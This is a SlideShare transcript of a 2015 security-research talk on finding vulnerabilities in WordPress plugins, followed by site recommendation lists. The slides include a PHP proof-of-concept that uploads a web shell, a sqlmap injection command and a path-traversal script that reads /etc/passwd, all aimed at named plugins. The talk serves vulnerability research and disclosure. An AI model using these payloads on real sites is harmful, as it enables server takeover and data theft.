SlideShare une entreprise Scribd logo

Hacking Wordpress Plugins

Télécharger en tant que PPTX, PDF
Larry Cashdollar
Larry Cashdollar

Hacking WordPress plugins 101

Logiciels
1  sur  31
Hacking WordPress Plugins Larry W. Cashdollar 8/1/2015 v1.2
What is WordPress • Content Management System (CMS) • 23% of all websites (3/23/15) • Plugins - add functionality • Plugins may be authored by anyone
Why hack WordPress plugins? • #1 CMS by number and percentage • Poor security model • Lack of QA on 3rd party plugins • More fun than Ruby Gems
Methodology • Large code footprint with plugins and themes • Prefer no authentication required to exploit* • Look for PHP code that might be exploitable • Search specific traits or patterns: – upload.php – download.php – proxy.php
Requirements • Processes user input • Has reachable code, not just defining a class • Doesn’t check if accessed directly • Doesn’t require authentication • Doesn’t require WP API hooks*
Vulnerabilities • LFI • RFI • RCE • Open Proxies • SQL Injection • XSS
Plugin Code Criteria • Doesn’t have POST/GET/FILE/REQUEST PUNT • If (!defined(ABSPATH)) die; PUNT • If (!is_admin) die; PUNT • Function class() {}; PUNT • May have Injectable SELECT, INSERT, DELETE, UPDATE, etc.
A Quick Look • Download a few random plugins • Examine files named upload.php or download.php • Found RFI in videowhisper-video-presentation • The code:
1 <?php 2 3 if ($_GET["room"]) $room=$_GET["room"]; 4 if ($_POST["room"]) $room=$_POST["room"]; 5 $filename=$_FILES['vw_file']['name']; 6 7 include_once("incsan.php"); 8 sanV($room); 9 if (!$room) exit; 10 sanV($filename); 11 if (!$filename) exit; 12 13 if (strstr($filename,'.php')) exit; 14 15 //do not allow uploads to other folders 16 if ( strstr($room,"/") || strstr($room,"..") ) exit; 17 if ( strstr($filename,"/") || strstr($filename,"..") ) exit; 18 19 $destination="uploads/".$room."/"; 20 if ($_GET["slides"]) $destination .= "slides/"; 21 22 $ext=strtolower(substr($filename,-4)); 23 $allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi ",".mpg",".ppt",".pps "); 24 25 if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); 26 ?>loadstatus=1
Exploiting it • Upload .phtml .shtml • Execute as www-data user • Previously patched (I circumvented)* • Also present in videowhisper-video- conference-integration * Annoying but still fun
Initial Progress • Downloaded 10 random plugins • Found RFI in two of them! • Plugins had ~ 5k downloads • Must be more vulnerabilities out there
Automate? • Download lots of plugins • grep code for specific patterns? • Same idea as Ruby Gem research I did • Easy to test with PoC • More fun! • Maybe write code to flag high risk code?
Code Ferret v1.0 Feature Doc • Supply list of .php files to examine • Check for user input • Ignore if author checks for ABSPATH etc.. • Look for SQL functions • Flag if use of WP API • Flag if include files
Code Ferret v1.0 Design Doc • Look for specific functions and strings • Anything of interest added to link list • Link list stores line number and reason for flag • Dump output & statistics • ANSI COLOR!
Semi Automatic • git pull https://plugins.svn.wordpress.org • Scraped Plugins off wordpress.org • Downloaded 36,000 plugins • About 20 GB of data • upload.php or download.php • Use Ferret v1.0 to quickly examine lots of files • Profit! Err get some CVEs
Ferret output
Ferret First Run • wp-powerplaygallery v3.3 • Flagged for user input with no access controls • Accesses WordPress API calls • Loads WordPress functions via require_once() • Code examination turns up RFI and Blind SQLi!
wp-powerplaygallery RFI Code 143: if (!empty($_FILES)) { 144: if ($_FILES["file"]["error"] || !is_uploaded_file($_FILES["file"]["tmp_name"])) { 145: die('{"jsonrpc" : "2.0", "error" : {"code": 103, "message": "Failed to move uploaded file."} , "id" : "id"}'); 146: } 147: 148: // Read binary input stream and append it to temp file 149: if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) { 150: die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}'); 151: } . 158: while ($buff = fread($in, 4096)) { 159: fwrite($out, $buff); 160: }
wp-powerplaygallery SQLI code 131: $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."',' ".$_REQUEST['name']."',1,'','NULL')"; 133 : $wpdb->query($query);
RFI Exploit Requirements • POST request • Variable albumid must point at existing album in database • File to upload must exist locally • Use c99 shell as our payload • file variable contains payload with local full path • name variable contains our filename
PoC Exploit • <?php • /*Remote shell upload exploit for wp-powerplaygallery v3.3 */ • /*Larry W. Cashdollar @_larry0 • 6/27/2015 • albumid needs to be a numeric value matching an existing album number, 1 is probably a good start • but you can enumerate these by using curl, and looking for redirect 301 responses: • e.g. $ curl http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big • ->301 exists else 404 doesn't. • shell is http://www.vapidlabs.com/wp-content/uploads/power_play/4_uploadfolder/big/shell.php • */ • • • $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php'; • $file_name_with_full_path = '/var/www/shell.php'; • • echo "POST to $target_url $file_name_with_full_path"; • $post = array('albumid'=>’1' , 'name' => 'shell.php','file'=>'@'.$file_name_with_full_path); • • $ch = curl_init(); • curl_setopt($ch, CURLOPT_URL,$target_url); • curl_setopt($ch, CURLOPT_POST,1); • curl_setopt($ch, CURLOPT_POSTFIELDS, $post); • curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); • $result=curl_exec ($ch); • curl_close ($ch); • echo "<hr>"; • echo $result; • echo "<hr>"; • ?>
Blind SQLi Exploit • Sqlmap $ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp- powerplaygallery/upload.php --data "albumid=1” —dbms mysql –level 5 – risk 3
Lazy Exploits • Started using php-cgi to test exploits • The script Poc.sh #!/bin/sh export GATEWAY_INTERFACE=CGI/1.1 export PATH_TRANSLATED=UserSettings.php export QUERY_STRING=network=../../../../../../../../etc/passwd export REDIRECT_STATUS=CGI export REQUEST_METHOD=GET php-cgi ./plugin/buddystream/extensions/default/templates/UserSettings.php $ ./Poc.sh
Pitfalls of Exploitation • Exploitable code is a class and isn’t reachable* • Code uses WordPress functions or functions from other segments of code with no includes • Code is incomplete or just broken • Someone discovered it last year
Fatal Errors • [Thu Aug 06 07:22:58 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function trailingslashit() in /usr/share/wordpress/wp-content/plugins/ckeditor-for-wordpress/ckeditor_class.php on line 27 • [Sun Aug 02 13:55:06 2015] [error] [client 192.168.0.2] PHP Fatal error: require_once(): Failed opening required '/etc/wordpress/wp-settings.php' (include_path='.:/usr/share/php:/usr/share/pear') in /etc/wordpress/config-www.vapidlabs.com.php on line 90 • [Sun Aug 02 19:28:11 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20 • [Sun Aug 02 19:28:24 2015] [error] [client 192.168.0.16] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20 • [Sun Aug 02 19:28:28 2015] [error] [client 192.168.0.2] PHP Fatal error: Call to undefined function get_option() in /usr/share/wordpress/wp-content/plugins/omni-secure-files/lib/ajax/file_upload.php on line 20
Vulnerable and Broken • <?php • $uploaddir = 'uploads/'; This needs to be full path • $file = $uploaddir . basename($_FILES['uploadfile']['name']); • if (move_uploaded_file($_FILES['uploadfile']['tmp_name' ], $file)) { • echo "success"; • } else { • echo "error"; • } • ?>
oddities • Return local IP address of server • Prints the FULL path of the webserver server • Plugin that downloads itself ?!
Statistics • 20 CVEs • 26* Vulnerabilities found • 6 were previously discovered and not included* • All in all 32 Vulnerabilities discovered • Dozens of known exploitable vulnerabilities remain unpatched * I now google ‘<pluginname> vulnerability’ before bothering to document
Improvements • Parse php scripts checking for reachable code • Use RIPS v1.0 (thanks Chad!) • Circle back and examine vulnerabilities that require login to WP for exploitation
Questions? • larry@akamai.com • Twitter @_larry0
Who Am I • 15 years at Akamai Technologies • ​Hobbyist Vulnerability Researcher • ​75+ CVEs • ​Formerly Unix Systems Administrator 17 years • ​Penetration Tester Back in Late 90s • Enjoy Writing and Breaking Code

Recommandé

HTML + CSS Examples
HTML + CSS ExamplesHTML + CSS Examples
HTML + CSS ExamplesMohamed Loey
 
Curso css
Curso cssCurso css
Curso cssJesus Luque Medina
 
CSS Best practice
CSS Best practiceCSS Best practice
CSS Best practiceRuss Weakley
 
Introduction To Single Page Application
Introduction To Single Page ApplicationIntroduction To Single Page Application
Introduction To Single Page ApplicationKMS Technology
 
Java Thread Synchronization
Java Thread SynchronizationJava Thread Synchronization
Java Thread SynchronizationBenj Del Mundo
 
CSS Transitions, Transforms, Animations
CSS Transitions, Transforms, Animations CSS Transitions, Transforms, Animations
CSS Transitions, Transforms, Animations Rob LaPlaca
 
SASS - CSS with Superpower
SASS - CSS with SuperpowerSASS - CSS with Superpower
SASS - CSS with SuperpowerKanchha kaji Prajapati
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 

Recommandé

HTML + CSS Examples
HTML + CSS ExamplesHTML + CSS Examples
HTML + CSS ExamplesMohamed Loey
 
Curso css
Curso cssCurso css
Curso cssJesus Luque Medina
 
CSS Best practice
CSS Best practiceCSS Best practice
CSS Best practiceRuss Weakley
 
Introduction To Single Page Application
Introduction To Single Page ApplicationIntroduction To Single Page Application
Introduction To Single Page ApplicationKMS Technology
 
Java Thread Synchronization
Java Thread SynchronizationJava Thread Synchronization
Java Thread SynchronizationBenj Del Mundo
 
CSS Transitions, Transforms, Animations
CSS Transitions, Transforms, Animations CSS Transitions, Transforms, Animations
CSS Transitions, Transforms, Animations Rob LaPlaca
 
SASS - CSS with Superpower
SASS - CSS with SuperpowerSASS - CSS with Superpower
SASS - CSS with SuperpowerKanchha kaji Prajapati
 
Xss attack
Xss attackXss attack
Xss attackManjushree Mashal
 
AngularJS for Beginners
AngularJS for BeginnersAngularJS for Beginners
AngularJS for BeginnersEdureka!
 
LinkedList vs ArrayList in Java | Edureka
LinkedList vs ArrayList in Java | EdurekaLinkedList vs ArrayList in Java | Edureka
LinkedList vs ArrayList in Java | EdurekaEdureka!
 
Sql injection
Sql injectionSql injection
Sql injectionNuruzzaman Milon
 
Angularjs PPT
Angularjs PPTAngularjs PPT
Angularjs PPTAmit Baghel
 
REST & RESTful Web Services
REST & RESTful Web ServicesREST & RESTful Web Services
REST & RESTful Web ServicesHalil Burak Cetinkaya
 
Python3 (boto3) for aws
Python3 (boto3) for awsPython3 (boto3) for aws
Python3 (boto3) for awsSanjeev Kumar Jaiswal
 
Introduction to CSS
Introduction to CSSIntroduction to CSS
Introduction to CSSAmit Tyagi
 
Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2Knoldus Inc.
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Introduction to HTML and CSS
Introduction to HTML and CSSIntroduction to HTML and CSS
Introduction to HTML and CSSMario Hernandez
 
Introduction to HTML
Introduction to HTMLIntroduction to HTML
Introduction to HTMLAjay Khatri
 
ReactJS presentation.pptx
ReactJS presentation.pptxReactJS presentation.pptx
ReactJS presentation.pptxDivyanshGupta922023
 
Basic JavaScript Tutorial
Basic JavaScript TutorialBasic JavaScript Tutorial
Basic JavaScript TutorialDHTMLExtreme
 
CNIT 129S: Ch 6: Attacking Authentication
CNIT 129S: Ch 6: Attacking AuthenticationCNIT 129S: Ch 6: Attacking Authentication
CNIT 129S: Ch 6: Attacking AuthenticationSam Bowne
 
html5.ppt
html5.ppthtml5.ppt
html5.pptNiharika Gupta
 
Angular 2.0 forms
Angular 2.0 formsAngular 2.0 forms
Angular 2.0 formsEyal Vardi
 
Our Best Practices Are Killing Us
Our Best Practices Are Killing UsOur Best Practices Are Killing Us
Our Best Practices Are Killing UsNicole Sullivan
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxAaron Weaver
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
REST API 설계
REST API 설계REST API 설계
REST API 설계Terry Cho
 
CV Vikrant Singh
CV Vikrant SinghCV Vikrant Singh
CV Vikrant SinghVikrant Singh
 
bab 3 Aplikasi Turunan
bab 3 Aplikasi Turunanbab 3 Aplikasi Turunan
bab 3 Aplikasi TurunanRiaastutiab
 

Contenu connexe

Tendances

AngularJS for Beginners
AngularJS for BeginnersAngularJS for Beginners
AngularJS for BeginnersEdureka!
 
LinkedList vs ArrayList in Java | Edureka
LinkedList vs ArrayList in Java | EdurekaLinkedList vs ArrayList in Java | Edureka
LinkedList vs ArrayList in Java | EdurekaEdureka!
 
Introduction to CSS
Introduction to CSSIntroduction to CSS
Introduction to CSSAmit Tyagi
 
Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2Knoldus Inc.
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Amit Tyagi
 
Introduction to HTML and CSS
Introduction to HTML and CSSIntroduction to HTML and CSS
Introduction to HTML and CSSMario Hernandez
 
Introduction to HTML
Introduction to HTMLIntroduction to HTML
Introduction to HTMLAjay Khatri
 
Basic JavaScript Tutorial
Basic JavaScript TutorialBasic JavaScript Tutorial
Basic JavaScript TutorialDHTMLExtreme
 
CNIT 129S: Ch 6: Attacking Authentication
CNIT 129S: Ch 6: Attacking AuthenticationCNIT 129S: Ch 6: Attacking Authentication
CNIT 129S: Ch 6: Attacking AuthenticationSam Bowne
 
Angular 2.0 forms
Angular 2.0 formsAngular 2.0 forms
Angular 2.0 formsEyal Vardi
 
Our Best Practices Are Killing Us
Our Best Practices Are Killing UsOur Best Practices Are Killing Us
Our Best Practices Are Killing UsNicole Sullivan
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxAaron Weaver
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
REST API 설계
REST API 설계REST API 설계
REST API 설계Terry Cho
 

Tendances (20)

AngularJS for Beginners
AngularJS for BeginnersAngularJS for Beginners
AngularJS for Beginners
 
LinkedList vs ArrayList in Java | Edureka
LinkedList vs ArrayList in Java | EdurekaLinkedList vs ArrayList in Java | Edureka
LinkedList vs ArrayList in Java | Edureka
 
Sql injection
Sql injectionSql injection
Sql injection
 
Angularjs PPT
Angularjs PPTAngularjs PPT
Angularjs PPT
 
REST & RESTful Web Services
REST & RESTful Web ServicesREST & RESTful Web Services
REST & RESTful Web Services
 
Python3 (boto3) for aws
Python3 (boto3) for awsPython3 (boto3) for aws
Python3 (boto3) for aws
 
Introduction to CSS
Introduction to CSSIntroduction to CSS
Introduction to CSS
 
Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2Routing & Navigating Pages in Angular 2
Routing & Navigating Pages in Angular 2
 
Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)Cross Site Scripting ( XSS)
Cross Site Scripting ( XSS)
 
Introduction to HTML and CSS
Introduction to HTML and CSSIntroduction to HTML and CSS
Introduction to HTML and CSS
 
Introduction to HTML
Introduction to HTMLIntroduction to HTML
Introduction to HTML
 
ReactJS presentation.pptx
ReactJS presentation.pptxReactJS presentation.pptx
ReactJS presentation.pptx
 
Basic JavaScript Tutorial
Basic JavaScript TutorialBasic JavaScript Tutorial
Basic JavaScript Tutorial
 
CNIT 129S: Ch 6: Attacking Authentication
CNIT 129S: Ch 6: Attacking AuthenticationCNIT 129S: Ch 6: Attacking Authentication
CNIT 129S: Ch 6: Attacking Authentication
 
html5.ppt
html5.ppthtml5.ppt
html5.ppt
 
Angular 2.0 forms
Angular 2.0 formsAngular 2.0 forms
Angular 2.0 forms
 
Our Best Practices Are Killing Us
Our Best Practices Are Killing UsOur Best Practices Are Killing Us
Our Best Practices Are Killing Us
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)
 
REST API 설계
REST API 설계REST API 설계
REST API 설계
 

En vedette

bab 3 Aplikasi Turunan
bab 3 Aplikasi Turunanbab 3 Aplikasi Turunan
bab 3 Aplikasi TurunanRiaastutiab
 
Dakwah Nabi Muhammad SAW Di Mekkah
Dakwah Nabi Muhammad SAW Di MekkahDakwah Nabi Muhammad SAW Di Mekkah
Dakwah Nabi Muhammad SAW Di MekkahFauzan Arief
 
MS Power Point 2007 Mengenal Ms Power Point 2007
MS Power Point 2007 Mengenal Ms Power Point 2007MS Power Point 2007 Mengenal Ms Power Point 2007
MS Power Point 2007 Mengenal Ms Power Point 2007nurmayabadriatulj
 
Brick and Mortar Startup Schematic Report
Brick and Mortar Startup Schematic Report Brick and Mortar Startup Schematic Report
Brick and Mortar Startup Schematic Report Grant Hall
 
Creative Brief Reebok classic
Creative Brief Reebok classicCreative Brief Reebok classic
Creative Brief Reebok classicMaeva Condeço
 
Colgate company
Colgate companyColgate company
Colgate companygrvdgr8
 
Localization in V2X Communication Networks
Localization in V2X Communication NetworksLocalization in V2X Communication Networks
Localization in V2X Communication NetworksStefano Severi
 
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.Atlantic Training, LLC.
 
Electrical Safety in Construction by South Carolina State Association
Electrical Safety in Construction by South Carolina State AssociationElectrical Safety in Construction by South Carolina State Association
Electrical Safety in Construction by South Carolina State AssociationAtlantic Training, LLC.
 
Hand Signals for Crane Operations Training by Willis Safety Consulting
Hand Signals for Crane Operations Training by Willis Safety ConsultingHand Signals for Crane Operations Training by Willis Safety Consulting
Hand Signals for Crane Operations Training by Willis Safety ConsultingAtlantic Training, LLC.
 

En vedette (14)

CV Vikrant Singh
CV Vikrant SinghCV Vikrant Singh
CV Vikrant Singh
 
bab 3 Aplikasi Turunan
bab 3 Aplikasi Turunanbab 3 Aplikasi Turunan
bab 3 Aplikasi Turunan
 
Dakwah Nabi Muhammad SAW Di Mekkah
Dakwah Nabi Muhammad SAW Di MekkahDakwah Nabi Muhammad SAW Di Mekkah
Dakwah Nabi Muhammad SAW Di Mekkah
 
MS Power Point 2007 Mengenal Ms Power Point 2007
MS Power Point 2007 Mengenal Ms Power Point 2007MS Power Point 2007 Mengenal Ms Power Point 2007
MS Power Point 2007 Mengenal Ms Power Point 2007
 
Media (3)
Media (3)Media (3)
Media (3)
 
Brick and Mortar Startup Schematic Report
Brick and Mortar Startup Schematic Report Brick and Mortar Startup Schematic Report
Brick and Mortar Startup Schematic Report
 
Info za yagodoberachki v ispania 2016 м.02
Info za yagodoberachki v ispania 2016 м.02Info za yagodoberachki v ispania 2016 м.02
Info za yagodoberachki v ispania 2016 м.02
 
Creative Brief Reebok classic
Creative Brief Reebok classicCreative Brief Reebok classic
Creative Brief Reebok classic
 
Colgate company
Colgate companyColgate company
Colgate company
 
Localization in V2X Communication Networks
Localization in V2X Communication NetworksLocalization in V2X Communication Networks
Localization in V2X Communication Networks
 
kalkulus dasar
kalkulus dasarkalkulus dasar
kalkulus dasar
 
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.
For Construction at Your Pharmaceutical Facility Training by Torcon, Inc.
 
Electrical Safety in Construction by South Carolina State Association
Electrical Safety in Construction by South Carolina State AssociationElectrical Safety in Construction by South Carolina State Association
Electrical Safety in Construction by South Carolina State Association
 
Hand Signals for Crane Operations Training by Willis Safety Consulting
Hand Signals for Crane Operations Training by Willis Safety ConsultingHand Signals for Crane Operations Training by Willis Safety Consulting
Hand Signals for Crane Operations Training by Willis Safety Consulting
 

Similaire à Hacking Wordpress Plugins

How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)Larry Cashdollar
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) Volkan Özçelik
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesVolkan Özçelik
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Volkan Özçelik
 
GitBucket: The perfect Github clone by Scala
GitBucket: The perfect Github clone by ScalaGitBucket: The perfect Github clone by Scala
GitBucket: The perfect Github clone by Scalatakezoe
 
WordPress CLI in-depth
WordPress CLI in-depthWordPress CLI in-depth
WordPress CLI in-depthSanjay Willie
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...CA API Management
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best PracticesRobert Vidal
 
The Anatomy Of A Hack - WordCamp Sofia 2018
The Anatomy Of A Hack - WordCamp Sofia 2018The Anatomy Of A Hack - WordCamp Sofia 2018
The Anatomy Of A Hack - WordCamp Sofia 2018Brecht Ryckaert
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Servicestevemock
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsFelipe Prado
 
WordPress Harrisburg Meetup - Best Practices
WordPress Harrisburg Meetup - Best PracticesWordPress Harrisburg Meetup - Best Practices
WordPress Harrisburg Meetup - Best Practicesryanduff
 
Embracing HTTP in the era of API’s
Embracing HTTP in the era of API’sEmbracing HTTP in the era of API’s
Embracing HTTP in the era of API’sVisug
 
Best Practices for WordPress
Best Practices for WordPressBest Practices for WordPress
Best Practices for WordPressTaylor Lovett
 
doing_it_right() with WordPress
doing_it_right() with WordPressdoing_it_right() with WordPress
doing_it_right() with WordPressryanduff
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentationwebhostingguy
 

Similaire à Hacking Wordpress Plugins (20)

How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)How to discover 1352 Wordpress plugin 0days in one hour (not really)
How to discover 1352 Wordpress plugin 0days in one hour (not really)
 
External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1) External JavaScript Widget Development Best Practices (updated) (v.1.1)
External JavaScript Widget Development Best Practices (updated) (v.1.1)
 
External JavaScript Widget Development Best Practices
External JavaScript Widget Development Best PracticesExternal JavaScript Widget Development Best Practices
External JavaScript Widget Development Best Practices
 
Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012Java scriptwidgetdevelopmentjstanbul2012
Java scriptwidgetdevelopmentjstanbul2012
 
GitBucket: The perfect Github clone by Scala
GitBucket: The perfect Github clone by ScalaGitBucket: The perfect Github clone by Scala
GitBucket: The perfect Github clone by Scala
 
Introduction to Flask Micro Framework
Introduction to Flask Micro FrameworkIntroduction to Flask Micro Framework
Introduction to Flask Micro Framework
 
WordPress CLI in-depth
WordPress CLI in-depthWordPress CLI in-depth
WordPress CLI in-depth
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
 
WordPress Security and Best Practices
WordPress Security and Best PracticesWordPress Security and Best Practices
WordPress Security and Best Practices
 
The Anatomy Of A Hack - WordCamp Sofia 2018
The Anatomy Of A Hack - WordCamp Sofia 2018The Anatomy Of A Hack - WordCamp Sofia 2018
The Anatomy Of A Hack - WordCamp Sofia 2018
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
 
WordPress Harrisburg Meetup - Best Practices
WordPress Harrisburg Meetup - Best PracticesWordPress Harrisburg Meetup - Best Practices
WordPress Harrisburg Meetup - Best Practices
 
Securing your web apps now
Securing your web apps nowSecuring your web apps now
Securing your web apps now
 
Embracing HTTP in the era of API’s
Embracing HTTP in the era of API’sEmbracing HTTP in the era of API’s
Embracing HTTP in the era of API’s
 
Best Practices for WordPress
Best Practices for WordPressBest Practices for WordPress
Best Practices for WordPress
 
doing_it_right() with WordPress
doing_it_right() with WordPressdoing_it_right() with WordPress
doing_it_right() with WordPress
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
PowerPoint Presentation
PowerPoint PresentationPowerPoint Presentation
PowerPoint Presentation
 

Dernier

(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Asset Management Software - Infographic
Asset Management Software - InfographicAsset Management Software - Infographic
Asset Management Software - InfographicHr365.us smith
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfkalichargn70th171
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationkaushalgiri8080
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfjoe51371421
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
